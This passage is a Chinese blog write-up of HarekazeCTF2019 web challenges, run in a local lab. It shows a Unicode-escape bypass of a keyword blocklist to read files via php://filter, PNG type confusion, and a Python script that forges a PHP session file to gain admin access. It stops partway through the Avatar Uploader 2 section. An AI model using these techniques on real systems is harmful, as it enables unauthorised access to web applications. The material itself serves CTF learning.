<!DOCTYPE html>



  


<html class="theme-next gemini use-motion" lang="zh-Hans">
<head><meta name="generator" content="Hexo 3.9.0">
  <meta charset="UTF-8">
<meta http-equiv="X-UA-Compatible" content="IE=edge">
<meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1">
<meta name="theme-color" content="#222">









<meta http-equiv="Cache-Control" content="no-transform">
<meta http-equiv="Cache-Control" content="no-siteapp">
















  
  
  <link href="/lib/fancybox/source/jquery.fancybox.css?v=2.1.5" rel="stylesheet" type="text/css">







<link href="/lib/font-awesome/css/font-awesome.min.css?v=4.6.2" rel="stylesheet" type="text/css">

<link href="/css/main.css?v=5.1.4" rel="stylesheet" type="text/css">


  <link rel="apple-touch-icon" sizes="180x180" href="/images/apple-touch-icon-next.png?v=5.1.4">


  <link rel="icon" type="image/png" sizes="32x32" href="/images/favicon-32x32-next.png?v=5.1.4">


  <link rel="icon" type="image/png" sizes="16x16" href="/images/favicon-16x16-next.png?v=5.1.4">


  <link rel="mask-icon" href="/images/logo.svg?v=5.1.4" color="#222">





  <meta name="keywords" content="wp,HarekazeCTF,">





  <link rel="alternate" href="/atom.xml" title="peri0d的博客" type="application/atom+xml">






<meta name="description" content="在 buuoj 上看到的这个比赛题目，期间平台关了，就拿了 Dockerfile 本地做了，web 题目感觉还不错">
<meta name="keywords" content="wp,HarekazeCTF">
<meta property="og:type" content="article">
<meta property="og:title" content="HarekazeCTF2019 web 部分题解">
<meta property="og:url" content="http://yoursite.com/2019/10/14/HarekazeCTF2019 web/index.html">
<meta property="og:site_name" content="peri0d的博客">
<meta property="og:description" content="在 buuoj 上看到的这个比赛题目，期间平台关了，就拿了 Dockerfile 本地做了，web 题目感觉还不错">
<meta property="og:locale" content="zh-Hans">
<meta property="og:image" content="https://wcgimages.oss-cn-shenzhen.aliyuncs.com/buuoj/Harekaze2019_encode_1.png">
<meta property="og:image" content="https://wcgimages.oss-cn-shenzhen.aliyuncs.com/buuoj/Harekaze2019_encode_2.png">
<meta property="og:image" content="https://wcgimages.oss-cn-shenzhen.aliyuncs.com/buuoj/Harekaze2019_encode_3.png">
<meta property="og:image" content="https://wcgimages.oss-cn-shenzhen.aliyuncs.com/buuoj/Harekaze2019_encode_4.png">
<meta property="og:image" content="https://wcgimages.oss-cn-shenzhen.aliyuncs.com/buuoj/Harekaze2019_avatar1_1.png">
<meta property="og:image" content="https://wcgimages.oss-cn-shenzhen.aliyuncs.com/buuoj/Harekaze2019_avatar1_2.png">
<meta property="og:image" content="https://wcgimages.oss-cn-shenzhen.aliyuncs.com/buuoj/Harekaze2019_avatar1_3.png">
<meta property="og:image" content="https://wcgimages.oss-cn-shenzhen.aliyuncs.com/buuoj/Harekaze2019_avatar1_4.png">
<meta property="og:image" content="https://wcgimages.oss-cn-shenzhen.aliyuncs.com/buuoj/Harekaze2019_avatar1_5.png">
<meta property="og:image" content="https://wcgimages.oss-cn-shenzhen.aliyuncs.com/buuoj/Harekaze2019_avatar1_6.png">
<meta property="og:image" content="https://wcgimages.oss-cn-shenzhen.aliyuncs.com/buuoj/Harekaze2019_notes_1.png">
<meta property="og:image" content="https://wcgimages.oss-cn-shenzhen.aliyuncs.com/buuoj/Harekaze2019_notes_2.png">
<meta property="og:image" content="https://wcgimages.oss-cn-shenzhen.aliyuncs.com/buuoj/Harekaze2019_notes_3.png">
<meta property="og:image" content="https://wcgimages.oss-cn-shenzhen.aliyuncs.com/buuoj/Harekaze2019_notes_4.png">
<meta property="og:image" content="https://wcgimages.oss-cn-shenzhen.aliyuncs.com/buuoj/Harekaze2019_notes_5.png">
<meta property="og:image" content="https://wcgimages.oss-cn-shenzhen.aliyuncs.com/buuoj/Harekaze2019_notes_6.png">
<meta property="og:image" content="https://wcgimages.oss-cn-shenzhen.aliyuncs.com/buuoj/Harekaze2019_notes_7.png">
<meta property="og:image" content="https://wcgimages.oss-cn-shenzhen.aliyuncs.com/buuoj/Harekaze2019_avatar2_1.png">
<meta property="og:image" content="https://wcgimages.oss-cn-shenzhen.aliyuncs.com/buuoj/Harekaze2019_avatar2_2.png">
<meta property="og:image" content="https://wcgimages.oss-cn-shenzhen.aliyuncs.com/buuoj/Harekaze2019_avatar2_3.png">
<meta property="og:image" content="https://wcgimages.oss-cn-shenzhen.aliyuncs.com/buuoj/Harekaze2019_avatar2_4.png">
<meta property="og:image" content="https://wcgimages.oss-cn-shenzhen.aliyuncs.com/buuoj/Harekaze2019_avatar2_5.png">
<meta property="og:image" content="https://wcgimages.oss-cn-shenzhen.aliyuncs.com/buuoj/Harekaze2019_avatar2_6.png">
<meta property="og:image" content="https://wcgimages.oss-cn-shenzhen.aliyuncs.com/buuoj/Harekaze2019_avatar2_7.png">
<meta property="og:image" content="https://wcgimages.oss-cn-shenzhen.aliyuncs.com/buuoj/Harekaze2019_vote_1.png">
<meta property="og:image" content="https://wcgimages.oss-cn-shenzhen.aliyuncs.com/buuoj/Harekaze2019_vote_3.png">
<meta property="og:image" content="https://wcgimages.oss-cn-shenzhen.aliyuncs.com/buuoj/Harekaze2019_vote_2.png">
<meta property="og:updated_time" content="2019-10-13T16:07:17.120Z">
<meta name="twitter:card" content="summary">
<meta name="twitter:title" content="HarekazeCTF2019 web 部分题解">
<meta name="twitter:description" content="在 buuoj 上看到的这个比赛题目，期间平台关了，就拿了 Dockerfile 本地做了，web 题目感觉还不错">
<meta name="twitter:image" content="https://wcgimages.oss-cn-shenzhen.aliyuncs.com/buuoj/Harekaze2019_encode_1.png">



<script type="text/javascript" id="hexo.configurations">
  var NexT = window.NexT || {};
  var CONFIG = {
    root: '/',
    scheme: 'Gemini',
    version: '5.1.4',
    sidebar: {"position":"left","display":"post","offset":12,"b2t":true,"scrollpercent":true,"onmobile":false},
    fancybox: true,
    tabs: true,
    motion: {"enable":true,"async":false,"transition":{"post_block":"fadeIn","post_header":"slideDownIn","post_body":"slideDownIn","coll_header":"slideLeftIn","sidebar":"slideUpIn"}},
    duoshuo: {
      userId: '0',
      author: '博主'
    },
    algolia: {
      applicationID: '',
      apiKey: '',
      indexName: '',
      hits: {"per_page":10},
      labels: {"input_placeholder":"Search for Posts","hits_empty":"We didn't find any results for the search: ${query}","hits_stats":"${hits} results found in ${time} ms"}
    }
  };
</script>



  <link rel="canonical" href="http://yoursite.com/2019/10/14/HarekazeCTF2019 web/">





  <title>HarekazeCTF2019 web 部分题解 | peri0d的博客</title>
  





  <script type="text/javascript">
    var _hmt = _hmt || [];
    (function() {
      var hm = document.createElement("script");
      hm.src = "https://hm.baidu.com/hm.js?351c3c63a2d13254dc54096c79858649";
      var s = document.getElementsByTagName("script")[0];
      s.parentNode.insertBefore(hm, s);
    })();
  </script>




</head>

<body itemscope itemtype="http://schema.org/WebPage" lang="zh-Hans">

  
  
    
  

  <div class="container sidebar-position-left page-post-detail">
    <div class="headband"></div>

    <header id="header" class="header" itemscope itemtype="http://schema.org/WPHeader">
      <div class="header-inner"><div class="site-brand-wrapper">
  <div class="site-meta ">
    

    <div class="custom-logo-site-title">
      <a href="/" class="brand" rel="start">
        <span class="logo-line-before"><i></i></span>
        <span class="site-title">peri0d的博客</span>
        <span class="logo-line-after"><i></i></span>
      </a>
    </div>
      
        <p class="site-subtitle">我是一只小兔子</p>
      
  </div>

  <div class="site-nav-toggle">
    <button>
      <span class="btn-bar"></span>
      <span class="btn-bar"></span>
      <span class="btn-bar"></span>
    </button>
  </div>
</div>

<nav class="site-nav">
  

  
    <ul id="menu" class="menu">
      
        
        <li class="menu-item menu-item-home">
          <a href="/" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-home"></i> <br>
            
            首页
          </a>
        </li>
      
        
        <li class="menu-item menu-item-tags">
          <a href="/tags/" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-tags"></i> <br>
            
            标签
          </a>
        </li>
      
        
        <li class="menu-item menu-item-categories">
          <a href="/categories/" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-th"></i> <br>
            
            分类
          </a>
        </li>
      
        
        <li class="menu-item menu-item-archives">
          <a href="/archives/" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-archive"></i> <br>
            
            归档
          </a>
        </li>
      

      
        <li class="menu-item menu-item-search">
          
            <a href="javascript:;" class="popup-trigger">
          
            
              <i class="menu-item-icon fa fa-search fa-fw"></i> <br>
            
            搜索
          </a>
        </li>
      
    </ul>
  

  
    <div class="site-search">
      
  <div class="popup search-popup local-search-popup">
  <div class="local-search-header clearfix">
    <span class="search-icon">
      <i class="fa fa-search"></i>
    </span>
    <span class="popup-btn-close">
      <i class="fa fa-times-circle"></i>
    </span>
    <div class="local-search-input-wrapper">
      <input autocomplete="off" placeholder="搜索..." spellcheck="false" type="text" id="local-search-input">
    </div>
  </div>
  <div id="local-search-result"></div>
</div>



    </div>
  
</nav>



 </div>
    </header>

    <main id="main" class="main">
      <div class="main-inner">
        <div class="content-wrap">
          <div id="content" class="content">
            

  <div id="posts" class="posts-expand">
    

  

  
  
  

  <article class="post post-type-normal" itemscope itemtype="http://schema.org/Article">
  
  
  
  <div class="post-block">
    <link itemprop="mainEntityOfPage" href="http://yoursite.com/2019/10/14/HarekazeCTF2019 web/">

    <span hidden itemprop="author" itemscope itemtype="http://schema.org/Person">
      <meta itemprop="name" content="peri0d">
      <meta itemprop="description" content>
      <meta itemprop="image" content="/images/toux.jpg">
    </span>

    <span hidden itemprop="publisher" itemscope itemtype="http://schema.org/Organization">
      <meta itemprop="name" content="peri0d的博客">
    </span>

    
      <header class="post-header">

        
        
          <h1 class="post-title" itemprop="name headline">HarekazeCTF2019 web 部分题解</h1>
        

        <div class="post-meta">
          <span class="post-time">
            
              <span class="post-meta-item-icon">
                <i class="fa fa-calendar-o"></i>
              </span>
              
                <span class="post-meta-item-text">发表于</span>
              
              <time title="创建于" itemprop="dateCreated datePublished" datetime="2019-10-14T00:03:17+08:00">
                2019-10-14
              </time>
            

            

            
          </span>

          
            <span class="post-category">
            
              <span class="post-meta-divider">|</span>
            
              <span class="post-meta-item-icon">
                <i class="fa fa-folder-o"></i>
              </span>
              
                <span class="post-meta-item-text">分类于</span>
              
              
                <span itemprop="about" itemscope itemtype="http://schema.org/Thing">
                  <a href="/categories/CTF-wp/" itemprop="url" rel="index">
                    <span itemprop="name">CTF wp</span>
                  </a>
                </span>

                
                
              
            </span>
          

          
            
          

          
          
             <span id="/2019/10/14/HarekazeCTF2019 web/" class="leancloud_visitors" data-flag-title="HarekazeCTF2019 web 部分题解">
               <span class="post-meta-divider">|</span>
               <span class="post-meta-item-icon">
                 <i class="fa fa-eye"></i>
               </span>
               
                 <span class="post-meta-item-text">阅读次数&#58;</span>
               
                 <span class="leancloud-visitors-count"></span>
             </span>
          

          

          

          

        </div>
      </header>
    

    
    
    
    <div class="post-body" itemprop="articleBody">

      
      

      
        <p>在 buuoj 上看到的这个比赛题目，期间平台关了，就拿了 Dockerfile 本地做了，web 题目感觉还不错</p>
<a id="more"></a>

<h1 id="encode-and-encode-100"><a href="#encode-and-encode-100" class="headerlink" title="encode_and_encode [100]"></a>encode_and_encode [100]</h1><ul>
<li><p>打开靶机，前两个页面都是 html 页面，第三个给了页面源码</p>
<p><img src="https://wcgimages.oss-cn-shenzhen.aliyuncs.com/buuoj/Harekaze2019_encode_1.png" alt></p>
</li>
<li><p>源码如下</p>
</li>
</ul>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">&lt;?php</span></span><br><span class="line">error_reporting(<span class="number">0</span>);</span><br><span class="line">  </span><br><span class="line"><span class="keyword">if</span> (<span class="keyword">isset</span>($_GET[<span class="string">'source'</span>])) &#123;</span><br><span class="line">	show_source(<span class="keyword">__FILE__</span>);</span><br><span class="line">	<span class="keyword">exit</span>();</span><br><span class="line">&#125;</span><br><span class="line">  </span><br><span class="line"><span class="function"><span class="keyword">function</span> <span class="title">is_valid</span><span class="params">($str)</span> </span>&#123;</span><br><span class="line">	$banword = [</span><br><span class="line">      <span class="comment">// no path traversal</span></span><br><span class="line">      <span class="string">'\.\.'</span>,</span><br><span class="line">      <span class="comment">// no stream wrapper</span></span><br><span class="line">      <span class="string">'(php|file|glob|data|tp|zip|zlib|phar):'</span>,</span><br><span class="line">      <span class="comment">// no data exfiltration</span></span><br><span class="line">      <span class="string">'flag'</span></span><br><span class="line">    ];</span><br><span class="line">    $regexp = <span class="string">'/'</span> . implode(<span class="string">'|'</span>, $banword) . <span class="string">'/i'</span>;</span><br><span class="line">    <span class="keyword">if</span> (preg_match($regexp, $str)) &#123;</span><br><span class="line">      <span class="keyword">return</span> <span class="keyword">false</span>;</span><br><span class="line">    &#125;</span><br><span class="line">	<span class="keyword">return</span> <span class="keyword">true</span>;</span><br><span class="line">&#125;</span><br><span class="line">  </span><br><span class="line">$body = file_get_contents(<span class="string">'php://input'</span>);</span><br><span class="line">$json = json_decode($body, <span class="keyword">true</span>);</span><br><span class="line">  </span><br><span class="line"><span class="keyword">if</span> (is_valid($body) &amp;&amp; <span class="keyword">isset</span>($json) &amp;&amp; <span class="keyword">isset</span>($json[<span class="string">'page'</span>])) &#123;</span><br><span class="line">    $page = $json[<span class="string">'page'</span>];</span><br><span class="line">    $content = file_get_contents($page);</span><br><span class="line">    <span class="keyword">if</span> (!$content || !is_valid($content)) &#123;</span><br><span class="line">      $content = <span class="string">"&lt;p&gt;not found&lt;/p&gt;\n"</span>;</span><br><span class="line">    &#125;</span><br><span class="line">  &#125; <span class="keyword">else</span> &#123;</span><br><span class="line">	$content = <span class="string">'&lt;p&gt;invalid request&lt;/p&gt;'</span>;</span><br><span class="line">  &#125;</span><br><span class="line">  </span><br><span class="line"><span class="comment">// no data exfiltration!!!</span></span><br><span class="line">$content = preg_replace(<span class="string">'/HarekazeCTF\&#123;.+\&#125;/i'</span>, <span class="string">'HarekazeCTF&#123;&amp;lt;censored&amp;gt;&#125;'</span>, $content);</span><br><span class="line"><span class="keyword">echo</span> json_encode([<span class="string">'content'</span> =&gt; $content]);</span><br></pre></td></tr></table></figure>

<ul>
<li><p><code>file_get_contents(&#39;php://input&#39;)</code> 获取 post 的数据，<code>json_decode($body, true)</code> 用 json 格式解码 post 的数据，然后 <code>is_valid($body)</code> 对 post 数据检验，大概输入的格式如下</p>
<p><img src="https://wcgimages.oss-cn-shenzhen.aliyuncs.com/buuoj/Harekaze2019_encode_2.png" alt></p>
</li>
<li><p><code>is_valid($body)</code> 对 post 数据检验，导致无法传输 <code>$banword</code> 中的关键词，也就无法传输 <code>flag</code>，这里在 json 中，可以使用 Unicode 编码绕过，<code>flag</code> 就等于 <code>\u0066\u006c\u0061\u0067</code></p>
</li>
<li><p>通过检验后，获取 <code>page</code> 对应的文件，并且页面里的内容也要通过 <code>is_valid</code> 检验，然后将文件中 <code>HarekazeCTF{}</code> 替换为 <code>HarekazeCTF{&amp;lt;censored&amp;gt;}</code> ，这样就无法明文读取 flag</p>
</li>
<li><p>这里传入 <code>/\u0066\u006c\u0061\u0067</code> 后，由于 <code>flag</code> 文件中也包含 flag 关键字，所以返回 <code>not found</code> ，这也无法使用 <code>file://</code> </p>
<p><img src="https://wcgimages.oss-cn-shenzhen.aliyuncs.com/buuoj/Harekaze2019_encode_3.png" alt></p>
</li>
<li><p><code>file_get_contents</code> 是可以触发 <code>php://filter</code> 的，所以考虑使用伪协议读取，对 <code>php</code> 的过滤使用 <code>Unicode</code> 绕过即可</p>
<p><img src="https://wcgimages.oss-cn-shenzhen.aliyuncs.com/buuoj/Harekaze2019_encode_4.png" alt></p>
</li>
<li><p>可以看出，json 在传输时是 Unicode 编码的</p>
</li>
</ul>
<h1 id="Avatar-Uploader-1-100"><a href="#Avatar-Uploader-1-100" class="headerlink" title="Avatar Uploader 1 [100]"></a>Avatar Uploader 1 [100]</h1><ul>
<li><p>给了源码，打开靶机，登录之后，是一个文件上传</p>
<p><img src="https://wcgimages.oss-cn-shenzhen.aliyuncs.com/buuoj/Harekaze2019_avatar1_1.png" alt></p>
</li>
<li><p>首先 <code>config.php</code> 中定义了一些常量</p>
<p><img src="https://wcgimages.oss-cn-shenzhen.aliyuncs.com/buuoj/Harekaze2019_avatar1_2.png" alt></p>
</li>
<li><p>然后在 <code>upload.php</code> 中判断文件大小，并使用 <code>FILEINFO</code> 判断上传图片类型，上传图片只能是 png 类型</p>
<p><img src="https://wcgimages.oss-cn-shenzhen.aliyuncs.com/buuoj/Harekaze2019_avatar1_3.png" alt></p>
</li>
<li><p>后面再用 <code>getimagesize</code> 判断文件像素大小，并且再进行一次类型判断，如果不是 png 类型就给出 flag</p>
<p><img src="https://wcgimages.oss-cn-shenzhen.aliyuncs.com/buuoj/Harekaze2019_avatar1_4.png" alt></p>
</li>
<li><p>在这两种判断上传图片类型的函数中，有一个很有趣的现象， <code>FILEINFO</code> 可以识别 png 图片( 十六进制下 )的第一行，而 <code>getimagesize</code> 不可以，代码如下</p>
</li>
</ul>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">&lt;?php</span></span><br><span class="line">$file = finfo_open(FILEINFO_MIME_TYPE);</span><br><span class="line">  </span><br><span class="line">var_dump(finfo_file($file, <span class="string">"test"</span>));</span><br><span class="line">  </span><br><span class="line">$f = getimagesize(<span class="string">"test"</span>); </span><br><span class="line">var_dump($f[<span class="number">2</span>] === IMAGETYPE_PNG);</span><br></pre></td></tr></table></figure>

<ul>
<li><p>结果，16进制文件也在下面</p>
<p><img src="https://wcgimages.oss-cn-shenzhen.aliyuncs.com/buuoj/Harekaze2019_avatar1_5.png" alt></p>
<p><img src="https://wcgimages.oss-cn-shenzhen.aliyuncs.com/buuoj/Harekaze2019_avatar1_6.png" alt></p>
</li>
<li><p>直接上传这个文件就可以获取 flag 了</p>
</li>
</ul>
<h1 id="Easy-Notes-200"><a href="#Easy-Notes-200" class="headerlink" title="Easy Notes [200]"></a>Easy Notes [200]</h1><ul>
<li><p>给了源码，打开靶机，是一个笔记系统</p>
<p><img src="https://wcgimages.oss-cn-shenzhen.aliyuncs.com/buuoj/Harekaze2019_notes_1.png" alt></p>
</li>
<li><p>在登陆处进行了匹配，只允许输入 4 到 64 位规定字符，且不是前端验证</p>
<p><img src="https://wcgimages.oss-cn-shenzhen.aliyuncs.com/buuoj/Harekaze2019_notes_2.png" alt></p>
</li>
<li><p>登陆成功后，可以进行增删查和导出为 zip 或 tar 的功能，点击 <code>Get flag</code> 提示不是 admin</p>
</li>
<li><p>既然拿到源码就先看看全局配置 <code>config.php</code> ，就写了一行，定义临时文件目录</p>
</li>
</ul>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">define(<span class="string">'TEMP_DIR'</span>, <span class="string">'/var/www/tmp'</span>);</span><br></pre></td></tr></table></figure>

<ul>
<li><p>进入 <code>page/flag.php</code> 看一下给出 flag 的条件，要满足 <code>is_admin()</code> 函数</p>
<p><img src="https://wcgimages.oss-cn-shenzhen.aliyuncs.com/buuoj/Harekaze2019_notes_3.png" alt></p>
</li>
<li><p>跟进 <code>is_admin()</code> 函数，没有发现什么可以利用的地方</p>
<p><img src="https://wcgimages.oss-cn-shenzhen.aliyuncs.com/buuoj/Harekaze2019_notes_4.png" alt></p>
</li>
<li><p>看到有个导出功能，它会将添加的 note 导出为 zip，这个文件存放的位置在 <code>TEMP_DIR</code> ，和 <code>session</code> 信息保存在同一个位置，那么是不是可以考虑伪造 session</p>
</li>
<li><p>session 文件以 <code>sess_</code> 开头，且只含有 <code>a-z</code>，<code>A-Z</code>，<code>0-9</code>，<code>-</code> </p>
</li>
<li><p>看到 <code>$filename</code> 处可以满足所有的条件</p>
<p><img src="https://wcgimages.oss-cn-shenzhen.aliyuncs.com/buuoj/Harekaze2019_notes_5.png" alt></p>
</li>
<li><p>构造 <code>user</code> 为 <code>sess_</code> ，<code>type</code> 为 <code>.</code> ，经过处理之后，<code>$path</code> 就是 <code>TEMP_DIR/sess_0123456789abcdef</code> 这就伪造了一个 session 文件</p>
</li>
<li><p>然后向这个文件写入 note 的 <code>title</code> </p>
<p><img src="https://wcgimages.oss-cn-shenzhen.aliyuncs.com/buuoj/Harekaze2019_notes_6.png" alt></p>
</li>
<li><p>php 默认的 session 反序列化方式是 <code>php</code> ，其存储方式为 <code>键名+竖线+经过serialize函数序列处理的值</code> ，这就可以伪造 <code>admin</code> 了</p>
</li>
<li><p>在最后，它会将构造的 <code>$filename</code> 返回，这样就可以拿到构造出的 admin 的 session 数据</p>
<p><img src="https://wcgimages.oss-cn-shenzhen.aliyuncs.com/buuoj/Harekaze2019_notes_7.png" alt></p>
</li>
<li><p>很典型的 session 伪造，session 反序列化</p>
</li>
<li><p>利用脚本</p>
</li>
</ul>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">import</span> re</span><br><span class="line"><span class="keyword">import</span> requests</span><br><span class="line">URL = <span class="string">'http://192.168.233.136:9000/'</span></span><br><span class="line"></span><br><span class="line"><span class="keyword">while</span> <span class="literal">True</span>:</span><br><span class="line">	<span class="comment"># login as sess_</span></span><br><span class="line">	sess = requests.Session()</span><br><span class="line">	sess.post(URL + <span class="string">'login.php'</span>, data=&#123;</span><br><span class="line">		<span class="string">'user'</span>: <span class="string">'sess_'</span></span><br><span class="line">	&#125;)</span><br><span class="line"></span><br><span class="line">	<span class="comment"># make a crafted note</span></span><br><span class="line">	sess.post(URL + <span class="string">'add.php'</span>, data=&#123;</span><br><span class="line">		<span class="string">'title'</span>: <span class="string">'|N;admin|b:1;'</span>,</span><br><span class="line">		<span class="string">'body'</span>: <span class="string">'hello'</span></span><br><span class="line">	&#125;)</span><br><span class="line"></span><br><span class="line">	<span class="comment"># make a fake session</span></span><br><span class="line">	r = sess.get(URL + <span class="string">'export.php?type=.'</span>).headers[<span class="string">'Content-Disposition'</span>]</span><br><span class="line">	print(r)</span><br><span class="line">	</span><br><span class="line">	sessid = re.findall(<span class="string">r'sess_([0-9a-z-]+)'</span>, r)[<span class="number">0</span>]</span><br><span class="line">	print(sessid)</span><br><span class="line">	</span><br><span class="line">	<span class="comment"># get the flag</span></span><br><span class="line">	r = requests.get(URL + <span class="string">'?page=flag'</span>, cookies=&#123;</span><br><span class="line">		<span class="string">'PHPSESSID'</span>: sessid</span><br><span class="line">	&#125;).content.decode(<span class="string">'utf-8'</span>)</span><br><span class="line">	flag = re.findall(<span class="string">r'HarekazeCTF\&#123;.+\&#125;'</span>, r)</span><br><span class="line"></span><br><span class="line">	<span class="keyword">if</span> len(flag) &gt; <span class="number">0</span>:</span><br><span class="line">		print(flag[<span class="number">0</span>])</span><br><span class="line">		<span class="keyword">break</span></span><br></pre></td></tr></table></figure>

<h1 id="Avatar-Uploader-2-300"><a href="#Avatar-Uploader-2-300" class="headerlink" title="Avatar Uploader 2 [300]"></a>Avatar Uploader 2 [300]</h1><ul>
<li><p>接 <code>Uploader1</code> ，这里是找第二个 flag</p>
</li>
<li><p>给的 hint: <a href="https://php.net/manual/ja/function.password-hash.php" target="_blank" rel="noopener">https://php.net/manual/ja/function.password-hash.php</a></p>
</li>
<li><p><code>upload.php</code> 中可以利用的暂时已经利用完了，看一下 <code>index.php</code> 吧</p>
</li>
<li><p><code>index.php</code> 代码简化大致如下</p>
</li>
</ul>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">&lt;?php</span></span><br><span class="line">error_reporting(<span class="number">0</span>);</span><br><span class="line"></span><br><span class="line"><span class="keyword">require_once</span>(<span class="string">'config.php'</span>);</span><br><span class="line"><span class="keyword">require_once</span>(<span class="string">'lib/util.php'</span>);</span><br><span class="line"><span class="keyword">require_once</span>(<span class="string">'lib/session.php'</span>);</span><br><span class="line"></span><br><span class="line">$session = <span class="keyword">new</span> SecureClientSession(CLIENT_SESSION_ID, SECRET_KEY);</span><br><span class="line"><span class="keyword">if</span> ($session-&gt;isset(<span class="string">'flash'</span>)) &#123;</span><br><span class="line">  $flash = $session-&gt;get(<span class="string">'flash'</span>);</span><br><span class="line">  $session-&gt;unset(<span class="string">'flash'</span>);</span><br><span class="line">&#125;</span><br><span class="line">$avatar = $session-&gt;isset(<span class="string">'avatar'</span>) ? <span class="string">'uploads/'</span> . $session-&gt;get(<span class="string">'avatar'</span>) : <span class="string">'default.png'</span> ;</span><br><span class="line">$session-&gt;save();</span><br><span class="line"></span><br><span class="line"><span class="keyword">include</span>(<span class="string">'common.css'</span>);</span><br><span class="line"></span><br><span class="line"><span class="keyword">include</span>($session-&gt;get(<span class="string">'theme'</span>, <span class="string">'light'</span>) . <span class="string">'.css'</span>);</span><br><span class="line"></span><br><span class="line"><span class="keyword">if</span> ($session-&gt;isset(<span class="string">'name'</span>)) &#123;</span><br><span class="line">    <span class="keyword">echo</span> <span class="string">"Hello"</span>.$session-&gt;get(<span class="string">'name'</span>).<span class="string">"&lt;/br&gt;"</span>;</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line"><span class="keyword">if</span> ($flash) &#123;</span><br><span class="line">    <span class="keyword">echo</span> $flash[<span class="string">'type'</span>].<span class="string">"&lt;/br&gt;"</span>;</span><br><span class="line">    <span class="keyword">echo</span> $flash[<span class="string">'message'</span>].<span class="string">"&lt;/br&gt;"</span>;</span><br><span class="line">&#125;</span><br><span class="line"><span class="keyword">if</span> ($session-&gt;isset(<span class="string">'name'</span>)) &#123;</span><br><span class="line">    <span class="keyword">echo</span> <span class="string">"Please upload"</span>.<span class="string">"&lt;/br&gt;"</span>;</span><br><span class="line">&#125; <span class="keyword">else</span> &#123;</span><br><span class="line">    <span class="keyword">echo</span> <span class="string">"Please sign in"</span>.<span class="string">"&lt;/br&gt;"</span>;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>

<ul>
<li><p>这里的 session 处理机制是自己写的，在 <code>lib\session.php</code> 中，首先确认的事情是，登录后 HTTP 头部返回的 <code>Cookie</code> 是 <code>session=******.******</code>  这种格式的</p>
</li>
<li><p>首先 <code>__construct</code> 中，判断 <code>session</code> 是否存在 <code>$_COOKIE</code> 中，如果存在则以 <code>.</code> 分割 <code>session</code> ，然后对 <code>data</code> 和 <code>signature</code> 进行 <code>verify</code> 函数认证，认证成功就返回数据的 <code>json_decode</code> 的结果</p>
<p><img src="https://wcgimages.oss-cn-shenzhen.aliyuncs.com/buuoj/Harekaze2019_avatar2_1.png" alt></p>
</li>
<li><p><code>isset</code> 中判断参数 <code>$key</code> 是否在 <code>data</code> 中，<code>get</code> 中返回 <code>data</code> 中 <code>key</code> 为参数 <code>$key</code> 的数据，<code>set</code> 中将 <code>data</code> 中  <code>key</code> 为参数 <code>$key</code> 的数据设置为参数 <code>$value</code>，<code>unset</code> 中删除 <code>data</code> 中 <code>key</code> 为参数 <code>$key</code> 的数据</p>
<p><img src="https://wcgimages.oss-cn-shenzhen.aliyuncs.com/buuoj/Harekaze2019_avatar2_2.png" alt></p>
</li>
<li><p><code>save</code> 中将 <code>data</code> 转化为 json 并进行 <code>urlsafe_base64_encode</code>，再用 <code>sign</code> 对 <code>data</code> 进行签名</p>
<p><img src="https://wcgimages.oss-cn-shenzhen.aliyuncs.com/buuoj/Harekaze2019_avatar2_3.png" alt></p>
</li>
